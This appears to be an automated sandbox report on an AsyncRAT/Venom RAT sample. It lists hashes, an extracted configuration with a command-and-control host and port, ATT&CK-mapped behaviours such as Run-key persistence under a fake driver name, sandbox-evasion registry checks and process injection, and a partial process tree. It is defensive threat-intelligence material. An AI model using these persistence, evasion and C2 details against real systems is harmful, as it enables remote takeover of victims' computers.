asyncrat | 78ce536df6722793cde9eca1bc9f78bc4abe3d17613eb950401c1fbc0335142c

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
10/05/2024, 07:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe
Size

1.5MB
MD5

9c0f25deda5fd180238008b7b97fab10
SHA1

f65d5a0b184c6bc0866ea214b2dbe37135eb6f9c
SHA256

78ce536df6722793cde9eca1bc9f78bc4abe3d17613eb950401c1fbc0335142c
SHA512

6d5c2a12818e8f6b6e0260ef81c18409c9b4319fff3ec7000ccf5b6dfa29b933ccfadcc414f8af83d3ca2c3f7def5f52f1ca649c698691c742e3559a0fb317b3
SSDEEP

24576:8NNGBDaQ3lPIiTr9befL/s20Z7RMnaGq3Lpu/ukPew0t4OH6Lwu69wYzGXIgA/H7:/lVwzl0Z7zGq7ptw0t9RfP

Score

10^/10

asyncrat zgrat venom clients execution persistence rat

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

blue.o7lab.me:4449

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes

delay
10
install
true
install_file
pop3.exe
install_folder
%Temp%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect ZGRat V1 1 IoCs

resource	yara_rule
behavioral2/memory/1524-171-0x000001CEC7460000-0x000001CEC7562000-memory.dmp	family_zgrat_v1

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3116 created 616	3116	powershell.EXE	5

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/memory/2108-189-0x0000000000AE0000-0x0000000000B22000-memory.dmp	family_asyncrat
behavioral2/memory/2108-223-0x0000000005AA0000-0x0000000005AB6000-memory.dmp	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1564	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	VENOM.exe

Deletes itself 1 IoCs

pid	Process
3336	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
2248	O7BOT.exe
1524	svchost.exe
2108	VENOM.exe
3972	Install.exe
1860	TypeId.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Audio HD Driver = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinUpdate.exe"	O7BOT.exe

Drops file in System32 directory 10 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\Exception\TypeId	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3116 set thread context of 3240	3116	powershell.EXE	92
PID 1860 set thread context of 2200	1860	TypeId.exe	96

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2660	2108	WerFault.exe	82

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	O7BOT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	O7BOT.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 54 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715325169"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3336	powershell.exe
3336	powershell.exe
3116	powershell.EXE
3116	powershell.EXE
3116	powershell.EXE
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
1564	powershell.exe
1564	powershell.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe
3240	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3336	powershell.exe
Token: SeDebugPrivilege	2248	O7BOT.exe
Token: SeDebugPrivilege	1524	svchost.exe
Token: SeDebugPrivilege	3116	powershell.EXE
Token: SeDebugPrivilege	3116	powershell.EXE
Token: SeDebugPrivilege	3240	dllhost.exe
Token: SeBackupPrivilege	1124	svchost.exe
Token: SeRestorePrivilege	1124	svchost.exe
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeBackupPrivilege	1124	svchost.exe
Token: SeRestorePrivilege	1124	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2608	svchost.exe
Token: SeIncreaseQuotaPrivilege	2608	svchost.exe
Token: SeSecurityPrivilege	2608	svchost.exe
Token: SeTakeOwnershipPrivilege	2608	svchost.exe
Token: SeLoadDriverPrivilege	2608	svchost.exe
Token: SeSystemtimePrivilege	2608	svchost.exe
Token: SeBackupPrivilege	2608	svchost.exe
Token: SeRestorePrivilege	2608	svchost.exe
Token: SeShutdownPrivilege	2608	svchost.exe
Token: SeSystemEnvironmentPrivilege	2608	svchost.exe
Token: SeUndockPrivilege	2608	svchost.exe
Token: SeManageVolumePrivilege	2608	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2608	svchost.exe
Token: SeIncreaseQuotaPrivilege	2608	svchost.exe
Token: SeSecurityPrivilege	2608	svchost.exe
Token: SeTakeOwnershipPrivilege	2608	svchost.exe
Token: SeLoadDriverPrivilege	2608	svchost.exe
Token: SeSystemtimePrivilege	2608	svchost.exe
Token: SeBackupPrivilege	2608	svchost.exe
Token: SeRestorePrivilege	2608	svchost.exe
Token: SeShutdownPrivilege	2608	svchost.exe
Token: SeSystemEnvironmentPrivilege	2608	svchost.exe
Token: SeUndockPrivilege	2608	svchost.exe
Token: SeManageVolumePrivilege	2608	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2608	svchost.exe
Token: SeIncreaseQuotaPrivilege	2608	svchost.exe
Token: SeSecurityPrivilege	2608	svchost.exe
Token: SeTakeOwnershipPrivilege	2608	svchost.exe
Token: SeLoadDriverPrivilege	2608	svchost.exe
Token: SeSystemtimePrivilege	2608	svchost.exe
Token: SeBackupPrivilege	2608	svchost.exe
Token: SeRestorePrivilege	2608	svchost.exe
Token: SeShutdownPrivilege	2608	svchost.exe
Token: SeSystemEnvironmentPrivilege	2608	svchost.exe
Token: SeUndockPrivilege	2608	svchost.exe
Token: SeManageVolumePrivilege	2608	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2608	svchost.exe
Token: SeIncreaseQuotaPrivilege	2608	svchost.exe
Token: SeSecurityPrivilege	2608	svchost.exe
Token: SeTakeOwnershipPrivilege	2608	svchost.exe
Token: SeLoadDriverPrivilege	2608	svchost.exe
Token: SeSystemtimePrivilege	2608	svchost.exe
Token: SeBackupPrivilege	2608	svchost.exe
Token: SeRestorePrivilege	2608	svchost.exe
Token: SeShutdownPrivilege	2608	svchost.exe
Token: SeSystemEnvironmentPrivilege	2608	svchost.exe
Token: SeUndockPrivilege	2608	svchost.exe
Token: SeManageVolumePrivilege	2608	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2608	svchost.exe
Token: SeIncreaseQuotaPrivilege	2608	svchost.exe
Token: SeSecurityPrivilege	2608	svchost.exe
Token: SeTakeOwnershipPrivilege	2608	svchost.exe
Token: SeLoadDriverPrivilege	2608	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4948 wrote to memory of 2248	4948	9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe	80
PID 4948 wrote to memory of 2248	4948	9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe	80
PID 4948 wrote to memory of 1524	4948	9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe	81
PID 4948 wrote to memory of 1524	4948	9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe	81
PID 4948 wrote to memory of 2108	4948	9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe	82
PID 4948 wrote to memory of 2108	4948	9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe	82
PID 4948 wrote to memory of 2108	4948	9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe	82
PID 4948 wrote to memory of 3336	4948	9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe	83
PID 4948 wrote to memory of 3336	4948	9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe	83
PID 4948 wrote to memory of 3336	4948	9c0f25deda5fd180238008b7b97fab10_NeikiAnalytics.exe	83
PID 2108 wrote to memory of 3972	2108	VENOM.exe	86
PID 2108 wrote to memory of 3972	2108	VENOM.exe	86
PID 2108 wrote to memory of 3972	2108	VENOM.exe	86
PID 3116 wrote to memory of 3240	3116	powershell.EXE	92
PID 3116 wrote to memory of 3240	3116	powershell.EXE	92
PID 3116 wrote to memory of 3240	3116	powershell.EXE	92
PID 3116 wrote to memory of 3240	3116	powershell.EXE	92
PID 3116 wrote to memory of 3240	3116	powershell.EXE	92
PID 3116 wrote to memory of 3240	3116	powershell.EXE	92
PID 3116 wrote to memory of 3240	3116	powershell.EXE	92
PID 3116 wrote to memory of 3240	3116	powershell.EXE	92
PID 3240 wrote to memory of 616	3240	dllhost.exe	5
PID 3240 wrote to memory of 668	3240	dllhost.exe	7
PID 3240 wrote to memory of 956	3240	dllhost.exe	12
PID 3240 wrote to memory of 60	3240	dllhost.exe	13
PID 3240 wrote to memory of 448	3240	dllhost.exe	14
PID 3240 wrote to memory of 728	3240	dllhost.exe	15
PID 3240 wrote to memory of 1016	3240	dllhost.exe	16
PID 3240 wrote to memory of 1032	3240	dllhost.exe	17
PID 3240 wrote to memory of 1124	3240	dllhost.exe	19
PID 3240 wrote to memory of 1184	3240	dllhost.exe	20
PID 3240 wrote to memory of 1196	3240	dllhost.exe	21
PID 3240 wrote to memory of 1336	3240	dllhost.exe	22
PID 3240 wrote to memory of 1344	3240	dllhost.exe	23
PID 3240 wrote to memory of 1356	3240	dllhost.exe	24
PID 3240 wrote to memory of 1388	3240	dllhost.exe	25
PID 3240 wrote to memory of 1432	3240	dllhost.exe	26
PID 3240 wrote to memory of 1516	3240	dllhost.exe	27
PID 3240 wrote to memory of 1580	3240	dllhost.exe	28
PID 3240 wrote to memory of 1664	3240	dllhost.exe	29
PID 3240 wrote to memory of 1752	3240	dllhost.exe	30
PID 3240 wrote to memory of 1776	3240	dllhost.exe	31
PID 3240 wrote to memory of 1892	3240	dllhost.exe	32
PID 3240 wrote to memory of 1900	3240	dllhost.exe	33
PID 3240 wrote to memory of 1916	3240	dllhost.exe	34
PID 3240 wrote to memory of 1940	3240	dllhost.exe	35
PID 3240 wrote to memory of 1988	3240	dllhost.exe	36
PID 3240 wrote to memory of 1708	3240	dllhost.exe	37
PID 3240 wrote to memory of 2100	3240	dllhost.exe	39
PID 3240 wrote to memory of 2116	3240	dllhost.exe	40
PID 3240 wrote to memory of 2372	3240	dllhost.exe	41
PID 3240 wrote to memory of 2380	3240	dllhost.exe	42
PID 3240 wrote to memory of 2436	3240	dllhost.exe	43
PID 3240 wrote to memory of 2524	3240	dllhost.exe	44
PID 3240 wrote to memory of 2560	3240	dllhost.exe	45
PID 3240 wrote to memory of 2580	3240	dllhost.exe	46
PID 3240 wrote to memory of 2600	3240	dllhost.exe	47
PID 3240 wrote to memory of 2608	3240	dllhost.exe	48
PID 3240 wrote to memory of 2644	3240	dllhost.exe	49
PID 3240 wrote to memory of 2748	3240	dllhost.exe	50
PID 3240 wrote to memory of 2968	3240	dllhost.exe	51
PID 3240 wrote to memory of 2192	3240	dllhost.exe	52
PID 3240 wrote to memory of 2784	3240	dllhost.exe	53
PID 3240 wrote to memory of 3308	3240	dllhost.exe	55

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:60
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5ed3d787-49b0-4d1b-a766-067ae39f9386}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3240

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:448

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1016

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1124
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
